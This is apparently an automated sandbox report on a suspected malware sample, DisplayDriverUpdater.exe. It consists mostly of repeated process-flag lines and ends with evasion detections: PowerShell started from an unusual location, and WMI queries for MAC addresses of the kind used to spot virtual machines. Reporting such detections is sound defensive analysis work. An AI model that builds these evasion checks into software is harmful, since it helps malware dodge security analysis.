Source: C:\Windows\System32\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Powershell is started from unusual location (likely to bypass HIPS)
Source: c:\users\user\appdata\roaming\displaydriverupdater.exeKey value queried: Powershell behavior
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT MACAddress FROM Win32_NetworkAdapter WHERE NetEnabled = True
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT MACAddress FROM Win32_NetworkAdapter
